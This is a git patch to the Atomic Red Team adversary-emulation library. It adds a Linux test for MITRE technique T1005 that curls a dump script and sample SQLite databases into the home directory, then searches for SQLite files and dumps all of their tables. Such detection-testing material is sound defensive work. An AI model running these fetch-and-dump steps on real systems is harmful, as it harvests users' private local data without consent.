From 07225ec592cd574dd2d5e8a198dc43bb316bd786 Mon Sep 17 00:00:00 2001
From: Biological Robot <121760096+biot-2131@users.noreply.github.com>
Date: Thu, 9 Nov 2023 04:05:07 +0000
Subject: [PATCH] T1005 Find and dump sqlite databases (Linux) (#2402)

---
 atomics/T1005/T1005.yaml         |  38 +++++++++++++++++++++++++++++--
 atomics/T1005/src/art            | Bin 0 -> 8192 bytes
 atomics/T1005/src/gta.db         | Bin 0 -> 12288 bytes
 atomics/T1005/src/sqlite_dump.sh |  31 +++++++++++++++++++++++++
 4 files changed, 67 insertions(+), 2 deletions(-)
 create mode 100644 atomics/T1005/src/art
 create mode 100644 atomics/T1005/src/gta.db
 create mode 100644 atomics/T1005/src/sqlite_dump.sh

diff --git a/atomics/T1005/T1005.yaml b/atomics/T1005/T1005.yaml
index 0f84e893cb..7c29fad1e4 100644
--- a/atomics/T1005/T1005.yaml
+++ b/atomics/T1005/T1005.yaml
@@ -1,5 +1,5 @@
 attack_technique: T1005
-display_name: 'Data from Local System'
+display_name: Data from Local System
 atomic_tests:
 - name: Search files of interest and save them to a single zip file (Windows)                                  
   auto_generated_guid: d3d9af44-b8ad-4375-8b0a-4bff4b7e419c
@@ -52,4 +52,38 @@ atomic_tests:
       Remove-Item -Path  $outputZip\data.zip -Force
 
     name: powershell
-    elevation_required: false
\ No newline at end of file
+    elevation_required: false
+- name: Find and dump sqlite databases (Linux)
+  description: |
+    An adversary may know/assume that the user of a system uses sqlite databases which contain interest and sensitive data. In this test we download two databases and a sqlite dump script, then run a find command to find & dump the database content.
+  supported_platforms:
+  - linux
+  input_arguments:
+    remote_url:
+      description: url of remote payload
+      type: url
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1005/src
+  dependencies:
+  - description: |
+      Check if running on a Debian based machine.
+    prereq_command: |
+      if [ -x "$(command -v sqlite3)" ]; then echo "sqlite3 is installed"; else echo "sqlite3 is NOT installed"; exit 1; fi
+      if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
+      if [ -x "$(command -v strings)" ]; then echo "strings is installed"; else echo "strings is NOT installed"; exit 1; fi
+    get_prereq_command: |
+      if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then apt update && apt install -y binutils curl sqlite3; fi
+      if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then yum update -y && yum install -y binutils curl sqlite-devel; fi
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+        cd $HOME
+        curl -O #{remote_url}/art
+        curl -O #{remote_url}/gta.db
+        curl -O #{remote_url}/sqlite_dump.sh
+        chmod +x sqlite_dump.sh
+        find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;
+    cleanup_command: |
+        rm -f $HOME/.art
+        rm -f $HOME/gta.db
+        rm -f $HOME/sqlite_dump.sh 
diff --git a/atomics/T1005/src/art b/atomics/T1005/src/art
new file mode 100644
index 0000000000000000000000000000000000000000..a4d0780c4cbc7e1a029cc4d28128bb96542df8f4
GIT binary patch
literal 8192
zcmeI#PfNov6aesKD~JcFc-b{a1sO}*G>u+1Wf$2d>cn%BzRbe9jkcm5J$v#?`MJyn
z1DyvyfbWri?~y<7yXEd?R5ZZcvMP1MVsc0*C4I&SA=LMl@7q}C!8Y;pI{zyu={{T?
z_+2#oAiiOs01BW03ZMWApa2S>01BW03ZMWAtOZKC*XeZVn`*R~!&41ay%}1Ux5L47
z$fkpf(U5IQ$FHC(RxBErLB%H5Q#QFDjZPVqx|p*DUYc*km9FdOWtIP|pRE7pL3l*M
z&+t8*_yq<Epa2S>01BW03ZMWApa2S>01EsIfwLf>avYSpnnAyLgt{nK^>R^n?Xt8|
zN)S1u+zOL$VR&pJ<E)HhC7gouc0kp*UFzAa_;onT@&tskGIKmhj9;kOr9G=8WTqG8
zsufT%Zq18Y@4jnvo;q%I&u<fP7IE$(nF`?kI%S2+Xs|EFMpw=5$vAQu^o&VWlIRqi
Pe~QO~8yT6*X=}d#aTay)

literal 0
HcmV?d00001

diff --git a/atomics/T1005/src/gta.db b/atomics/T1005/src/gta.db
new file mode 100644
index 0000000000000000000000000000000000000000..83136923cf0e4d86f91dc3aa8c7cb33f22941dd5
GIT binary patch
literal 12288
zcmeI%zi-n(6bJCTi|I|&Y*B}(4<thi0ST(85)&qhqEuE8Bn>d3Yx~k#O>OmjRmq6N
z%74PYf)LPwg_(bWk#nkqkPNI;`ab#BdwMzBpY1ul=Sk|AhPgd4j<&=NA*FaiB!rND
zulRi$Wgbiue=hTXg%l57?p*g>DvU+=!5<J1fB*y_009U<00Izz00bZafvYI6qgJYG
zYx2~Yy%F!HF6H9#SZTg!#r+ob<EKfBE^8Zy&b;xLV{-h~)yc9M{mC~^rLNX$@?B%H
znB@_hf{W={{k7n<x-n*BDa{-ovZd~`K6Q7Kq)wSR;mKX*YO_1fYMbS3u2(Na_$~Yx
zz7Jo8>#M(fihuwFAOHafKmY;|fB*y_009X6_X4+cpdQ}TKibx02h=~}p`-ZB<upk0
zf_f%%c@eDyYAe#;mwGybB;8}{NA#wj)3>h$s@>2Ri*1j~Whl-L`~+VV&iKF3^Wl8$
zZV;&Ey8gQS!$G>wleK3Tw=02aMEc8OFLgSd`G<*=f3G|G^HSfVI2)fIvE@4L_Tqao
zQ1`d>r^U9}V|MwR+GlLDg2(0jFT<b0ZwLrL00Izz00bZa0SG_<0uX=z1g^F~RaT<f
O{I`Vi8^G(_9{&bS=C&gM

literal 0
HcmV?d00001

diff --git a/atomics/T1005/src/sqlite_dump.sh b/atomics/T1005/src/sqlite_dump.sh
new file mode 100644
index 0000000000..ef7f90d360
--- /dev/null
+++ b/atomics/T1005/src/sqlite_dump.sh
@@ -0,0 +1,31 @@
+#!/bin/bash
+
+# This script will dump each table in a sqlite 3 database
+
+# Check if the first command-line argument is empty
+if [ -z "$1" ]; then
+  echo "Error: No filename provided. Exiting..."
+  exit 1
+fi
+
+# Set the name of the SQLite database file
+DB_NAME=$1
+
+if [ "$(head -c 15 $DB_NAME |strings)" == "SQLite format 3" ]
+then
+    # List all tables
+    echo "List of tables:"
+    sqlite3 $DB_NAME "SELECT name FROM sqlite_master WHERE type='table';"
+
+    # Retrieve all rows from each table
+    tables=$(sqlite3 $DB_NAME "SELECT name FROM sqlite_master WHERE type='table';")
+    echo "Retrieving data from tables:"
+    for table in $tables; do
+        echo "Table: $table"
+        sqlite3 $DB_NAME "SELECT * FROM $table;"
+    done
+    echo ""
+else
+    echo "Error: The file is not a sqlite database."
+    exit 1
+fi